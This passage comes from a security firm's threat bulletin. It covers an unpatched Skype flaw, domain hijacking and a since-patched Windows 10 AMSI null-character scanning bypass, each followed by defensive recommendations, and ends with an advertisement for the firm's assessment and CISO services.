    The Skype vulnerability will not be patched anytime soon. It’s not because the flaw is unpatchable, but because fixing the vulnerability requires a significant software rewrite, which indicates that the company will need to issue an all-new version of Skype rather than just a patch.

    To mitigate a breach, we recommend:

    • Do not click on suspicious links from unknown senders
    • Make sure you validate the security and completeness of files downloaded from the internet
    • Monitor system activities for malicious behavior
    • Run updated anti-virus/anti-malware software as a first line of defense
    • Overall, practice good end-user awareness and training—an informed user will be less of an inadvertent security threat to the company.

    2. Domain Hijacking

    Overview

    Domain hijacking could potentially have significant negative implications for any company/organization that has a web presence. Attackers could replace a company’s website, or web application, with an identical replica site designed to trick visitors into entering login credentials or personal information, thereby potentially helping to facilitate fraud. Malicious software could also be uploaded onto visitors’ computers. If a hijacked domain had been whitelisted by other businesses, that trust would be extended to the attacker. Such actions would almost certainly cause significant reputational as well as financial damage to affected organizations. Managed service providers are likely to be a higher priority target of domain hijacking due to the potential access and damage they could cause to their clients.

    Recommendations

    We recommend companies protect themselves by:

    • Picking an enterprise-class domain name registry
    • Keep up-to-date with security patches on servers and systems
    • Locking the domain using a web service to guard against unauthorized domain transfers
    • Ensuring all of domain name contacts have valid contact information
    • Setting the domain to auto-renew each year

    3. Windows 10 Null Character Flaw

    Overview

    The Windows 10 anti-malware scan interface (AMSI), which handles malware scan requests from inside applications, was found to be truncating files whenever a null character was read, leaving lines of code unscanned.

    AMSI handles at least part of the scanning for the antivirus app it interfaces with, leading to the problem discovered: AMSI simply stops processing whenever it runs into a null character, which can be any character with all its bits set to zero. Any malicious code hidden after the null character will simply be missed, allowing it to safely execute without detection. This means it essentially bypasses the anti-malware scanner altogether.

    AMSI inspects scripts invoked at startup, such as PowerShell, VBScript, Ruby, and others. Scripts are a common way of getting malware past antivirus scanners. Anything that makes it easier for attackers to do so, like this flaw, requires immediate action.

    Recommendations

    Microsoft’s latest round of security updates fixes this vulnerability, but that doesn’t mean attackers won’t try to exploit it. WannaCry, Petya, and other widespread cyberattacks from 2017 relied on unpatched systems to propagate malicious attacks.

    There’s no reason to assume attackers will stop relying on human error to spread malware, so be safe and install the February Windows 10 security updates ASAP.

    How can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.